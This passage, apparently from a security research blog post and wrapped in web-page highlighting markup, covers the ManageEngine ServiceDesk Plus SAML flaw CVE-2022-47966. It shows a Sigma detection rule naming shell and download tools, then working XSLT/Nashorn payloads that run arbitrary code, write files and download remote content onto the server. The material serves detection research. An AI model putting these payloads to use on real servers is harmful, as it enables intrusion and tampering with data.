'\\ManageEngine\\ServiceDesk\\'\n - '\\java.exe'\n Image|endswith:\n - '\\powershell.exe'\n - '\\sh.exe'\n - '\\bash.exe'\n - '\\pwsh.exe'\n - '\\schtasks.exe'\n - '\\certutil.exe'\n - '\\whoami.exe' # Often used in POCs\n - '\\bitsadmin.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\scrcons.exe'\n - '\\wmic.exe'\n - '\\mshta.exe'\n - '\\forfiles.exe'\n - '\\mftrace.exe'\n - '\\AppVLP.exe'\n - '\\curl.exe'\n - '\\notepad.exe' # Often used in POCs\n - '\\systeminfo.exe'\n - '\\net.exe'\n - '\\net1.exe'\n - '\\reg.exe'\n - '\\query.exe'\n",[886,109736,109734],{"__ignoreMap":219},[18,109738,109739,109740,109744,109745,109747,109748,109750,109751,109754],{},"This is a simple and effective detection, and it should work against the Metasploit ",[47,109741,49176],{"href":109742,"rel":109743},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fblob\u002Fa5ba1245c224a4be1dc97b3892e6d51dabbeb4f8\u002Fmodules\u002Fexploits\u002Fmulti\u002Fhttp\u002Fmanageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb#L60",[51]," developed for ManageEngine ServiceDesk Plus. That’s because the module uses Horizon3.ai’s ",[886,109746,109639],{}," transform to invoke Powershell (see ",[886,109749,99000],{}," in the rule above). However, the Sigma rule ",[295,109752,109753],{},"won’t"," work against an attacker that chooses to stay in memory.",[61,109756,109758],{"id":109757},"memory-resident-payload","Memory Resident Payload",[18,109760,109761],{},"There are numerous ways for an attacker to go about abusing XSLT transforms to stay in memory, but the most flexible way (in my opinion) is to just invoke the Nashorn JavaScript engine. That transform looks like this:",[1354,109763,109765],{"className":56326,"code":109764,"language":56328,"meta":219,"style":219},"\u003Cds:Transforms>\n \u003Cds:Transform Algorithm=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002F10\u002Fxml-exc-c14n#\"\u002F>\n \u003Cds:Transform Algorithm=\"http:\u002F\u002Fwww.w3.org\u002FTR\u002F1999\u002FREC-xslt-19991116\">\n \u003Cxsl:stylesheet version=\"1.0\"\n xmlns:sem=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngineManager\"\n xmlns:se=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngine\"\n xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\">\n \u003Cxsl:template match=\"\u002F\">\n \u003Cxsl:variable name=\"engineobject\" select=\"sem:new()\"\u002F>\n \u003Cxsl:variable name=\"jsobject\" select=\"sem:getEngineByName($engineobject,'nashorn')\"\u002F>\n \u003Cxsl:variable name=\"out\" select=\"se:eval($jsobject,'INSERT ARBITRARY CODE HERE')\"\u002F>\n \u003Cxsl:value-of select=\"$out\"\u002F>\n \u003C\u002Fxsl:template>\n \u003C\u002Fxsl:stylesheet>\n \u003C\u002Fds:Transform>\n\u003C\u002Fds:Transforms>\n",[886,109766,109767,109780,109802,109824,109844,109862,109880,109898,109921,109956,109990,110024,110048,110060,110072,110084],{"__ignoreMap":219},[1373,109768,109769,109771,109773,109776,109778],{"class":1375,"line":1376},[1373,109770,11852],{"class":1383},[1373,109772,109306],{"class":6300},[1373,109774,4606],{"class":109775},"s7uzT",[1373,109777,109311],{"class":6300},[1373,109779,6765],{"class":1383},[1373,109781,109782,109784,109786,109788,109790,109792,109794,109796,109798,109800],{"class":1375,"line":220},[1373,109783,8246],{"class":1383},[1373,109785,109306],{"class":6300},[1373,109787,4606],{"class":109775},[1373,109789,109324],{"class":6300},[1373,109791,109327],{"class":8252},[1373,109793,5417],{"class":1383},[1373,109795,183],{"class":1387},[1373,109797,109334],{"class":1391},[1373,109799,183],{"class":1387},[1373,109801,85355],{"class":1383},[1373,109803,109804,109806,109808,109810,109812,109814,109816,109818,109820,109822],{"class":1375,"line":1266},[1373,109805,8246],{"class":1383},[1373,109807,109306],{"class":6300},[1373,109809,4606],{"class":109775},[1373,109811,109324],{"class":6300},[1373,109813,109327],{"class":8252},[1373,109815,5417],{"class":1383},[1373,109817,183],{"class":1387},[1373,109819,109357],{"class":1391},[1373,109821,183],{"class":1387},[1373,109823,6765],{"class":1383},[1373,109825,109826,109828,109830,109832,109834,109836,109838,109840,109842],{"class":1375,"line":1852},[1373,109827,85290],{"class":1383},[1373,109829,109368],{"class":6300},[1373,109831,4606],{"class":109775},[1373,109833,49025],{"class":6300},[1373,109835,45880],{"class":8252},[1373,109837,5417],{"class":1383},[1373,109839,183],{"class":1387},[1373,109841,84878],{"class":1391},[1373,109843,19057],{"class":1387},[1373,109845,109846,109848,109850,109853,109855,109857,109860],{"class":1375,"line":4692},[1373,109847,109386],{"class":8252},[1373,109849,4606],{"class":51986},[1373,109851,109852],{"class":8252},"sem",[1373,109854,5417],{"class":1383},[1373,109856,183],{"class":1387},[1373,109858,109859],{"class":1391},"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngineManager",[1373,109861,19057],{"class":1387},[1373,109863,109864,109866,109868,109871,109873,109875,109878],{"class":1375,"line":4724},[1373,109865,109386],{"class":8252},[1373,109867,4606],{"class":51986},[1373,109869,109870],{"class":8252},"se",[1373,109872,5417],{"class":1383},[1373,109874,183],{"class":1387},[1373,109876,109877],{"class":1391},"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngine",[1373,109879,19057],{"class":1387},[1373,109881,109882,109884,109886,109888,109890,109892,109894,109896],{"class":1375,"line":4756},[1373,109883,109386],{"class":8252},[1373,109885,4606],{"class":51986},[1373,109887,109368],{"class":8252},[1373,109889,5417],{"class":1383},[1373,109891,183],{"class":1387},[1373,109893,109433],{"class":1391},[1373,109895,183],{"class":1387},[1373,109897,6765],{"class":1383},[1373,109899,109900,109902,109904,109906,109908,109911,109913,109915,109917,109919],{"class":1375,"line":4768},[1373,109901,109442],{"class":1383},[1373,109903,109368],{"class":6300},[1373,109905,4606],{"class":109775},[1373,109907,30296],{"class":6300},[1373,109909,109910],{"class":8252}," match",[1373,109912,5417],{"class":1383},[1373,109914,183],{"class":1387},[1373,109916,2180],{"class":1391},[1373,109918,183],{"class":1387},[1373,109920,6765],{"class":1383},[1373,109922,109923,109925,109927,109929,109932,109934,109936,109938,109941,109943,109945,109947,109949,109952,109954],{"class":1375,"line":4792},[1373,109924,109464],{"class":1383},[1373,109926,109368],{"class":6300},[1373,109928,4606],{"class":109775},[1373,109930,109931],{"class":6300},"variable",[1373,109933,46496],{"class":8252},[1373,109935,5417],{"class":1383},[1373,109937,183],{"class":1387},[1373,109939,109940],{"class":1391},"engineobject",[1373,109942,183],{"class":1387},[1373,109944,109483],{"class":8252},[1373,109946,5417],{"class":1383},[1373,109948,183],{"class":1387},[1373,109950,109951],{"class":1391},"sem:new()",[1373,109953,183],{"class":1387},[1373,109955,85355],{"class":1383},[1373,109957,109958,109960,109962,109964,109966,109968,109970,109972,109975,109977,109979,109981,109983,109986,109988],{"class":1375,"line":4798},[1373,109959,109464],{"class":1383},[1373,109961,109368],{"class":6300},[1373,109963,4606],{"class":109775},[1373,109965,109931],{"class":6300},[1373,109967,46496],{"class":8252},[1373,109969,5417],{"class":1383},[1373,109971,183],{"class":1387},[1373,109973,109974],{"class":1391},"jsobject",[1373,109976,183],{"class":1387},[1373,109978,109483],{"class":8252},[1373,109980,5417],{"class":1383},[1373,109982,183],{"class":1387},[1373,109984,109985],{"class":1391},"sem:getEngineByName($engineobject,'nashorn')",[1373,109987,183],{"class":1387},[1373,109989,85355],{"class":1383},[1373,109991,109992,109994,109996,109998,110000,110002,110004,110006,110009,110011,110013,110015,110017,110020,110022],{"class":1375,"line":4806},[1373,109993,109464],{"class":1383},[1373,109995,109368],{"class":6300},[1373,109997,4606],{"class":109775},[1373,109999,109931],{"class":6300},[1373,110001,46496],{"class":8252},[1373,110003,5417],{"class":1383},[1373,110005,183],{"class":1387},[1373,110007,110008],{"class":1391},"out",[1373,110010,183],{"class":1387},[1373,110012,109483],{"class":8252},[1373,110014,5417],{"class":1383},[1373,110016,183],{"class":1387},[1373,110018,110019],{"class":1391},"se:eval($jsobject,'INSERT ARBITRARY CODE HERE')",[1373,110021,183],{"class":1387},[1373,110023,85355],{"class":1383},[1373,110025,110026,110028,110030,110032,110035,110037,110039,110041,110044,110046],{"class":1375,"line":4817},[1373,110027,109464],{"class":1383},[1373,110029,109368],{"class":6300},[1373,110031,4606],{"class":109775},[1373,110033,110034],{"class":6300},"value-of",[1373,110036,109483],{"class":8252},[1373,110038,5417],{"class":1383},[1373,110040,183],{"class":1387},[1373,110042,110043],{"class":1391},"$out",[1373,110045,183],{"class":1387},[1373,110047,85355],{"class":1383},[1373,110049,110050,110052,110054,110056,110058],{"class":1375,"line":4825},[1373,110051,109588],{"class":1383},[1373,110053,109368],{"class":6300},[1373,110055,4606],{"class":109775},[1373,110057,30296],{"class":6300},[1373,110059,6765],{"class":1383},[1373,110061,110062,110064,110066,110068,110070],{"class":1375,"line":4835},[1373,110063,109601],{"class":1383},[1373,110065,109368],{"class":6300},[1373,110067,4606],{"class":109775},[1373,110069,49025],{"class":6300},[1373,110071,6765],{"class":1383},[1373,110073,110074,110076,110078,110080,110082],{"class":1375,"line":4843},[1373,110075,56557],{"class":1383},[1373,110077,109306],{"class":6300},[1373,110079,4606],{"class":109775},[1373,110081,109324],{"class":6300},[1373,110083,6765],{"class":1383},[1373,110085,110086,110088,110090,110092,110094],{"class":1375,"line":4849},[1373,110087,46627],{"class":1383},[1373,110089,109306],{"class":6300},[1373,110091,4606],{"class":109775},[1373,110093,109311],{"class":6300},[1373,110095,6765],{"class":1383},[18,110097,110098,110099,110101],{},"Using an XSLT transform to invoke Nashorn allows an attacker to do almost anything they’d want from within the original ManageEngine ",[886,110100,82664],{},". The attacker doesn’t need to invoke external programs because Java, however painful it may be, has a deep feature-rich standard library that is largely available to the Nashorn engine.",[18,110103,110104],{},"Need to write a file? No problem.",[1354,110106,110108],{"className":56326,"code":110107,"language":56328,"meta":219,"style":219},"\u003Cds:Transform Algorithm=\"http:\u002F\u002Fwww.w3.org\u002FTR\u002F1999\u002FREC-xslt-19991116\">\n \u003Cxsl:stylesheet version=\"1.0\"\n xmlns:sem=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngineManager\"\n xmlns:se=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngine\"\n xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\">\n \u003Cxsl:template match=\"\u002F\">\n \u003Cxsl:variable name=\"engineobject\" select=\"sem:new()\"\u002F>\n \u003Cxsl:variable name=\"jsobject\" select=\"sem:getEngineByName($engineobject,'nashorn')\"\u002F>\n \u003Cxsl:variable name=\"out\" select=\"se:eval($jsobject,'var FileWriter = Java.type("java.io.FileWriter");\n var rootPath = Java.type("java.lang.System").getenv("SystemDrive");\n rootPath += "\u002Fvulncheck.txt";\n var fwObj = new FileWriter(rootPath);\n fwObj.write("hello world!");\n fwObj.close();')\"\u002F>\n \u003Cxsl:value-of select=\"$out\"\u002F>\n \u003C\u002Fxsl:template>\n \u003C\u002Fxsl:stylesheet>\n\u003C\u002Fds:Transform>\n",[886,110109,110110,110132,110152,110169,110185,110203,110225,110257,110289,110335,110375,110397,110402,110423,110432,110454,110466,110478],{"__ignoreMap":219},[1373,110111,110112,110114,110116,110118,110120,110122,110124,110126,110128,110130],{"class":1375,"line":1376},[1373,110113,11852],{"class":1383},[1373,110115,109306],{"class":6300},[1373,110117,4606],{"class":109775},[1373,110119,109324],{"class":6300},[1373,110121,109327],{"class":8252},[1373,110123,5417],{"class":1383},[1373,110125,183],{"class":1387},[1373,110127,109357],{"class":1391},[1373,110129,183],{"class":1387},[1373,110131,6765],{"class":1383},[1373,110133,110134,110136,110138,110140,110142,110144,110146,110148,110150],{"class":1375,"line":220},[1373,110135,8246],{"class":1383},[1373,110137,109368],{"class":6300},[1373,110139,4606],{"class":109775},[1373,110141,49025],{"class":6300},[1373,110143,45880],{"class":8252},[1373,110145,5417],{"class":1383},[1373,110147,183],{"class":1387},[1373,110149,84878],{"class":1391},[1373,110151,19057],{"class":1387},[1373,110153,110154,110157,110159,110161,110163,110165,110167],{"class":1375,"line":1266},[1373,110155,110156],{"class":8252}," xmlns",[1373,110158,4606],{"class":51986},[1373,110160,109852],{"class":8252},[1373,110162,5417],{"class":1383},[1373,110164,183],{"class":1387},[1373,110166,109859],{"class":1391},[1373,110168,19057],{"class":1387},[1373,110170,110171,110173,110175,110177,110179,110181,110183],{"class":1375,"line":1852},[1373,110172,110156],{"class":8252},[1373,110174,4606],{"class":51986},[1373,110176,109870],{"class":8252},[1373,110178,5417],{"class":1383},[1373,110180,183],{"class":1387},[1373,110182,109877],{"class":1391},[1373,110184,19057],{"class":1387},[1373,110186,110187,110189,110191,110193,110195,110197,110199,110201],{"class":1375,"line":4692},[1373,110188,110156],{"class":8252},[1373,110190,4606],{"class":51986},[1373,110192,109368],{"class":8252},[1373,110194,5417],{"class":1383},[1373,110196,183],{"class":1387},[1373,110198,109433],{"class":1391},[1373,110200,183],{"class":1387},[1373,110202,6765],{"class":1383},[1373,110204,110205,110207,110209,110211,110213,110215,110217,110219,110221,110223],{"class":1375,"line":4724},[1373,110206,85290],{"class":1383},[1373,110208,109368],{"class":6300},[1373,110210,4606],{"class":109775},[1373,110212,30296],{"class":6300},[1373,110214,109910],{"class":8252},[1373,110216,5417],{"class":1383},[1373,110218,183],{"class":1387},[1373,110220,2180],{"class":1391},[1373,110222,183],{"class":1387},[1373,110224,6765],{"class":1383},[1373,110226,110227,110229,110231,110233,110235,110237,110239,110241,110243,110245,110247,110249,110251,110253,110255],{"class":1375,"line":4756},[1373,110228,109442],{"class":1383},[1373,110230,109368],{"class":6300},[1373,110232,4606],{"class":109775},[1373,110234,109931],{"class":6300},[1373,110236,46496],{"class":8252},[1373,110238,5417],{"class":1383},[1373,110240,183],{"class":1387},[1373,110242,109940],{"class":1391},[1373,110244,183],{"class":1387},[1373,110246,109483],{"class":8252},[1373,110248,5417],{"class":1383},[1373,110250,183],{"class":1387},[1373,110252,109951],{"class":1391},[1373,110254,183],{"class":1387},[1373,110256,85355],{"class":1383},[1373,110258,110259,110261,110263,110265,110267,110269,110271,110273,110275,110277,110279,110281,110283,110285,110287],{"class":1375,"line":4768},[1373,110260,109442],{"class":1383},[1373,110262,109368],{"class":6300},[1373,110264,4606],{"class":109775},[1373,110266,109931],{"class":6300},[1373,110268,46496],{"class":8252},[1373,110270,5417],{"class":1383},[1373,110272,183],{"class":1387},[1373,110274,109974],{"class":1391},[1373,110276,183],{"class":1387},[1373,110278,109483],{"class":8252},[1373,110280,5417],{"class":1383},[1373,110282,183],{"class":1387},[1373,110284,109985],{"class":1391},[1373,110286,183],{"class":1387},[1373,110288,85355],{"class":1383},[1373,110290,110291,110293,110295,110297,110299,110301,110303,110305,110307,110309,110311,110313,110315,110318,110320,110322,110324,110327,110329,110331,110333],{"class":1375,"line":4792},[1373,110292,109442],{"class":1383},[1373,110294,109368],{"class":6300},[1373,110296,4606],{"class":109775},[1373,110298,109931],{"class":6300},[1373,110300,46496],{"class":8252},[1373,110302,5417],{"class":1383},[1373,110304,183],{"class":1387},[1373,110306,110008],{"class":1391},[1373,110308,183],{"class":1387},[1373,110310,109483],{"class":8252},[1373,110312,5417],{"class":1383},[1373,110314,183],{"class":1387},[1373,110316,110317],{"class":1391},"se:eval($jsobject,'var FileWriter = Java.type(",[1373,110319,7218],{"class":7054},[1373,110321,85318],{"class":2209},[1373,110323,39663],{"class":7054},[1373,110325,110326],{"class":1391},"java.io.FileWriter",[1373,110328,7218],{"class":7054},[1373,110330,85318],{"class":2209},[1373,110332,39663],{"class":7054},[1373,110334,4680],{"class":1391},[1373,110336,110337,110340,110342,110344,110346,110349,110351,110353,110355,110358,110360,110362,110364,110367,110369,110371,110373],{"class":1375,"line":4798},[1373,110338,110339],{"class":1391}," var rootPath = Java.type(",[1373,110341,7218],{"class":7054},[1373,110343,85318],{"class":2209},[1373,110345,39663],{"class":7054},[1373,110347,110348],{"class":1391},"java.lang.System",[1373,110350,7218],{"class":7054},[1373,110352,85318],{"class":2209},[1373,110354,39663],{"class":7054},[1373,110356,110357],{"class":1391},").getenv(",[1373,110359,7218],{"class":7054},[1373,110361,85318],{"class":2209},[1373,110363,39663],{"class":7054},[1373,110365,110366],{"class":1391},"SystemDrive",[1373,110368,7218],{"class":7054},[1373,110370,85318],{"class":2209},[1373,110372,39663],{"class":7054},[1373,110374,4680],{"class":1391},[1373,110376,110377,110380,110382,110384,110386,110389,110391,110393,110395],{"class":1375,"line":4806},[1373,110378,110379],{"class":1391}," rootPath += ",[1373,110381,7218],{"class":7054},[1373,110383,85318],{"class":2209},[1373,110385,39663],{"class":7054},[1373,110387,110388],{"class":1391},"\u002Fvulncheck.txt",[1373,110390,7218],{"class":7054},[1373,110392,85318],{"class":2209},[1373,110394,39663],{"class":7054},[1373,110396,4912],{"class":1391},[1373,110398,110399],{"class":1375,"line":4817},[1373,110400,110401],{"class":1391}," var fwObj = new FileWriter(rootPath);\n",[1373,110403,110404,110407,110409,110411,110413,110415,110417,110419,110421],{"class":1375,"line":4825},[1373,110405,110406],{"class":1391}," fwObj.write(",[1373,110408,7218],{"class":7054},[1373,110410,85318],{"class":2209},[1373,110412,39663],{"class":7054},[1373,110414,82565],{"class":1391},[1373,110416,7218],{"class":7054},[1373,110418,85318],{"class":2209},[1373,110420,39663],{"class":7054},[1373,110422,4680],{"class":1391},[1373,110424,110425,110428,110430],{"class":1375,"line":4835},[1373,110426,110427],{"class":1391}," fwObj.close();')",[1373,110429,183],{"class":1387},[1373,110431,85355],{"class":1383},[1373,110433,110434,110436,110438,110440,110442,110444,110446,110448,110450,110452],{"class":1375,"line":4843},[1373,110435,109442],{"class":1383},[1373,110437,109368],{"class":6300},[1373,110439,4606],{"class":109775},[1373,110441,110034],{"class":6300},[1373,110443,109483],{"class":8252},[1373,110445,5417],{"class":1383},[1373,110447,183],{"class":1387},[1373,110449,110043],{"class":1391},[1373,110451,183],{"class":1387},[1373,110453,85355],{"class":1383},[1373,110455,110456,110458,110460,110462,110464],{"class":1375,"line":4849},[1373,110457,109601],{"class":1383},[1373,110459,109368],{"class":6300},[1373,110461,4606],{"class":109775},[1373,110463,30296],{"class":6300},[1373,110465,6765],{"class":1383},[1373,110467,110468,110470,110472,110474,110476],{"class":1375,"line":4877},[1373,110469,56557],{"class":1383},[1373,110471,109368],{"class":6300},[1373,110473,4606],{"class":109775},[1373,110475,49025],{"class":6300},[1373,110477,6765],{"class":1383},[1373,110479,110480,110482,110484,110486,110488],{"class":1375,"line":4915},[1373,110481,46627],{"class":1383},[1373,110483,109306],{"class":6300},[1373,110485,4606],{"class":109775},[1373,110487,109324],{"class":6300},[1373,110489,6765],{"class":1383},[18,110491,110492,110493,59],{},"Need to download something from the internet? Eat your heart out, ",[886,110494,84820],{},[1354,110496,110498],{"className":56326,"code":110497,"language":56328,"meta":219,"style":219},"\u003Cds:Transform Algorithm=\"http:\u002F\u002Fwww.w3.org\u002FTR\u002F1999\u002FREC-xslt-19991116\">\n \u003Cxsl:stylesheet version=\"1.0\"\n xmlns:sem=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngineManager\"\n xmlns:se=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngine\"\n xmlns:xsl=\"http:\u002F\u002Fwww.w3.org\u002F1999\u002FXSL\u002FTransform\">\n \u003Cxsl:template match=\"\u002F\">\n \u003Cxsl:variable name=\"engineobject\" select=\"sem:new()\"\u002F>\n \u003Cxsl:variable name=\"jsobject\" select=\"sem:getEngineByName($engineobject,'nashorn')\"\u002F>\n \u003Cxsl:variable name=\"out\" select=\"se:eval($jsobject,'var URL = Java.type("java.net.URL");\n var url = new URL("https" + String.fromCharCode(58) + "\u002F\u002Fwww.google.com:\u002F");\n var is = url.openStream();\n var localPath = Java.type("java.nio.file.Paths").get(Java.type("java.lang.System").getenv("SystemDrive") + "\u002Fvulncheck.txt");\n Java.type("java.nio.file.Files").copy(is, localPath);')\"\u002F>\n \u003Cxsl:value-of select=\"$out\"\u002F>\n \u003C\u002Fxsl:template>\n \u003C\u002Fxsl:stylesheet>\n\u003C\u002Fds:Transform>\n",[886,110499,110500,110522,110542,110558,110574,110592,110614,110646,110678,110724,110764,110769,110841,110868,110890,110902,110914],{"__ignoreMap":219},[1373,110501,110502,110504,110506,110508,110510,110512,110514,110516,110518,110520],{"class":1375,"line":1376},[1373,110503,11852],{"class":1383},[1373,110505,109306],{"class":6300},[1373,110507,4606],{"class":109775},[1373,110509,109324],{"class":6300},[1373,110511,109327],{"class":8252},[1373,110513,5417],{"class":1383},[1373,110515,183],{"class":1387},[1373,110517,109357],{"class":1391},[1373,110519,183],{"class":1387},[1373,110521,6765],{"class":1383},[1373,110523,110524,110526,110528,110530,110532,110534,110536,110538,110540],{"class":1375,"line":220},[1373,110525,8246],{"class":1383},[1373,110527,109368],{"class":6300},[1373,110529,4606],{"class":109775},[1373,110531,49025],{"class":6300},[1373,110533,45880],{"class":8252},[1373,110535,5417],{"class":1383},[1373,110537,183],{"class":1387},[1373,110539,84878],{"class":1391},[1373,110541,19057],{"class":1387},[1373,110543,110544,110546,110548,110550,110552,110554,110556],{"class":1375,"line":1266},[1373,110545,110156],{"class":8252},[1373,110547,4606],{"class":51986},[1373,110549,109852],{"class":8252},[1373,110551,5417],{"class":1383},[1373,110553,183],{"class":1387},[1373,110555,109859],{"class":1391},[1373,110557,19057],{"class":1387},[1373,110559,110560,110562,110564,110566,110568,110570,110572],{"class":1375,"line":1852},[1373,110561,110156],{"class":8252},[1373,110563,4606],{"class":51986},[1373,110565,109870],{"class":8252},[1373,110567,5417],{"class":1383},[1373,110569,183],{"class":1387},[1373,110571,109877],{"class":1391},[1373,110573,19057],{"class":1387},[1373,110575,110576,110578,110580,110582,110584,110586,110588,110590],{"class":1375,"line":4692},[1373,110577,110156],{"class":8252},[1373,110579,4606],{"class":51986},[1373,110581,109368],{"class":8252},[1373,110583,5417],{"class":1383},[1373,110585,183],{"class":1387},[1373,110587,109433],{"class":1391},[1373,110589,183],{"class":1387},[1373,110591,6765],{"class":1383},[1373,110593,110594,110596,110598,110600,110602,110604,110606,110608,110610,110612],{"class":1375,"line":4724},[1373,110595,85290],{"class":1383},[1373,110597,109368],{"class":6300},[1373,110599,4606],{"class":109775},[1373,110601,30296],{"class":6300},[1373,110603,109910],{"class":8252},[1373,110605,5417],{"class":1383},[1373,110607,183],{"class":1387},[1373,110609,2180],{"class":1391},[1373,110611,183],{"class":1387},[1373,110613,6765],{"class":1383},[1373,110615,110616,110618,110620,110622,110624,110626,110628,110630,110632,110634,110636,110638,110640,110642,110644],{"class":1375,"line":4756},[1373,110617,109442],{"class":1383},[1373,110619,109368],{"class":6300},[1373,110621,4606],{"class":109775},[1373,110623,109931],{"class":6300},[1373,110625,46496],{"class":8252},[1373,110627,5417],{"class":1383},[1373,110629,183],{"class":1387},[1373,110631,109940],{"class":1391},[1373,110633,183],{"class":1387},[1373,110635,109483],{"class":8252},[1373,110637,5417],{"class":1383},[1373,110639,183],{"class":1387},[1373,110641,109951],{"class":1391},[1373,110643,183],{"class":1387},[1373,110645,85355],{"class":1383},[1373,110647,110648,110650,110652,110654,110656,110658,110660,110662,110664,110666,110668,110670,110672,110674,110676],{"class":1375,"line":4768},[1373,110649,109442],{"class":1383},[1373,110651,109368],{"class":6300},[1373,110653,4606],{"class":109775},[1373,110655,109931],{"class":6300},[1373,110657,46496],{"class":8252},[1373,110659,5417],{"class":1383},[1373,110661,183],{"class":1387},[1373,110663,109974],{"class":1391},[1373,110665,183],{"class":1387},[1373,110667,109483],{"class":8252},[1373,110669,5417],{"class":1383},[1373,110671,183],{"class":1387},[1373,110673,109985],{"class":1391},[1373,110675,183],{"class":1387},[1373,110677,85355],{"class":1383},[1373,110679,110680,110682,110684,110686,110688,110690,110692,110694,110696,110698,110700,110702,110704,110707,110709,110711,110713,110716,110718,110720,110722],{"class":1375,"line":4792},[1373,110681,109442],{"class":1383},[1373,110683,109368],{"class":6300},[1373,110685,4606],{"class":109775},[1373,110687,109931],{"class":6300},[1373,110689,46496],{"class":8252},[1373,110691,5417],{"class":1383},[1373,110693,183],{"class":1387},[1373,110695,110008],{"class":1391},[1373,110697,183],{"class":1387},[1373,110699,109483],{"class":8252},[1373,110701,5417],{"class":1383},[1373,110703,183],{"class":1387},[1373,110705,110706],{"class":1391},"se:eval($jsobject,'var URL = Java.type(",[1373,110708,7218],{"class":7054},[1373,110710,85318],{"class":2209},[1373,110712,39663],{"class":7054},[1373,110714,110715],{"class":1391},"java.net.URL",[1373,110717,7218],{"class":7054},[1373,110719,85318],{"class":2209},[1373,110721,39663],{"class":7054},[1373,110723,4680],{"class":1391},[1373,110725,110726,110729,110731,110733,110735,110738,110740,110742,110744,110747,110749,110751,110753,110756,110758,110760,110762],{"class":1375,"line":4798},[1373,110727,110728],{"class":1391}," var url = new URL(",[1373,110730,7218],{"class":7054},[1373,110732,85318],{"class":2209},[1373,110734,39663],{"class":7054},[1373,110736,110737],{"class":1391},"https",[1373,110739,7218],{"class":7054},[1373,110741,85318],{"class":2209},[1373,110743,39663],{"class":7054},[1373,110745,110746],{"class":1391}," + String.fromCharCode(58) + ",[1373,110748,7218],{"class":7054},[1373,110750,85318],{"class":2209},[1373,110752,39663],{"class":7054},[1373,110754,110755],{"class":1391},"\u002F\u002Fwww.google.com:\u002F",[1373,110757,7218],{"class":7054},[1373,110759,85318],{"class":2209},[1373,110761,39663],{"class":7054},[1373,110763,4680],{"class":1391},[1373,110765,110766],{"class":1375,"line":4806},[1373,110767,110768],{"class":1391}," var is = url.openStream();\n",[1373,110770,110771,110774,110776,110778,110780,110783,110785,110787,110789,110792,110794,110796,110798,110800,110802,110804,110806,110808,110810,110812,110814,110816,110818,110820,110822,110825,110827,110829,110831,110833,110835,110837,110839],{"class":1375,"line":4817},[1373,110772,110773],{"class":1391}," var localPath = Java.type(",[1373,110775,7218],{"class":7054},[1373,110777,85318],{"class":2209},[1373,110779,39663],{"class":7054},[1373,110781,110782],{"class":1391},"java.nio.file.Paths",[1373,110784,7218],{"class":7054},[1373,110786,85318],{"class":2209},[1373,110788,39663],{"class":7054},[1373,110790,110791],{"class":1391},").get(Java.type(",[1373,110793,7218],{"class":7054},[1373,110795,85318],{"class":2209},[1373,110797,39663],{"class":7054},[1373,110799,110348],{"class":1391},[1373,110801,7218],{"class":7054},[1373,110803,85318],{"class":2209},[1373,110805,39663],{"class":7054},[1373,110807,110357],{"class":1391},[1373,110809,7218],{"class":7054},[1373,110811,85318],{"class":2209},[1373,110813,39663],{"class":7054},[1373,110815,110366],{"class":1391},[1373,110817,7218],{"class":7054},[1373,110819,85318],{"class":2209},[1373,110821,39663],{"class":7054},[1373,110823,110824],{"class":1391},") + ",[1373,110826,7218],{"class":7054},[1373,110828,85318],{"class":2209},[1373,110830,39663],{"class":7054},[1373,110832,110388],{"class":1391},[1373,110834,7218],{"class":7054},[1373,110836,85318],{"class":2209},[1373,110838,39663],{"class":7054},[1373,110840,4680],{"class":1391},[1373,110842,110843,110846,110848,110850,110852,110855,110857,110859,110861,110864,110866],{"class":1375,"line":4825},[1373,110844,110845],{"class":1391}," Java.type(",[1373,110847,7218],{"class":7054},[1373,110849,85318],{"class":2209},[1373,110851,39663],{"class":7054},[1373,110853,110854],{"class":1391},"java.nio.file.Files",[1373,110856,7218],{"class":7054},[1373,110858,85318],{"class":2209},[1373,110860,39663],{"class":7054},[1373,110862,110863],{"class":1391},").copy(is, localPath);')",[1373,110865,183],{"class":1387},[1373,110867,85355],{"class":1383},[1373,110869,110870,110872,110874,110876,110878,110880,110882,110884,110886,110888],{"class":1375,"line":4835},[1373,110871,109442],{"class":1383},[1373,110873,109368],{"class":6300},[1373,110875,4606],{"class":109775},[1373,110877,110034],{"class":6300},[1373,110879,109483],{"class":8252},[1373,110881,5417],{"class":1383},[1373,110883,183],{"class":1387},[1373,110885,110043],{"class":1391},[1373,110887,183],{"class":1387},[1373,110889,85355],{"class":1383},[1373,110891,110892,110894,110896,110898,110900],{"class":1375,"line":4843},[1373,110893,109601],{"class":1383},[1373,110895,109368],{"class":6300},[1373,110897,4606],{"class":109775},[1373,110899,30296],{"class":6300},[1373,110901,6765],{"class":1383},[1373,110903,110904,110906,110908,110910,110912],{"class":1375,"line":4849},[1373,110905,56557],{"class":1383},[1373,110907,109368],{"class":6300},[1373,110909,4606],{"class":109775},[1373,110911,49025],{"class":6300},[1373,110913,6765],{"class":1383},[1373,110915,110916,110918,110920,110922,110924],{"class":1375,"line":4877},[1373,110917,46627],{"class":1383},[1373,110919,109306],{"class":6300},[1373,110921,4606],{"class":109775},[1373,110923,109324],{"class":6300},[1373,110925,6765],{"class":1383},[18,110927,110928],{},"Need to delete a file? You can delete ‘em all if you want!",[1354,110930,110932],{"className":56326,"code":110931,"language":56328,"meta":219,"style":219},"\u003Cds:Transform Algorithm=\"http:\u002F\u002Fwww.w3.org\u002FTR\u002F1999\u002FREC-xslt-19991116\">\n \u003Cxsl:stylesheet version=\"1.0\"\n xmlns:sem=\"http:\u002F\u002Fxml.apache.org\u002Fxalan\u002Fjava\u002Fjavax.script.ScriptEngineManager\"\n 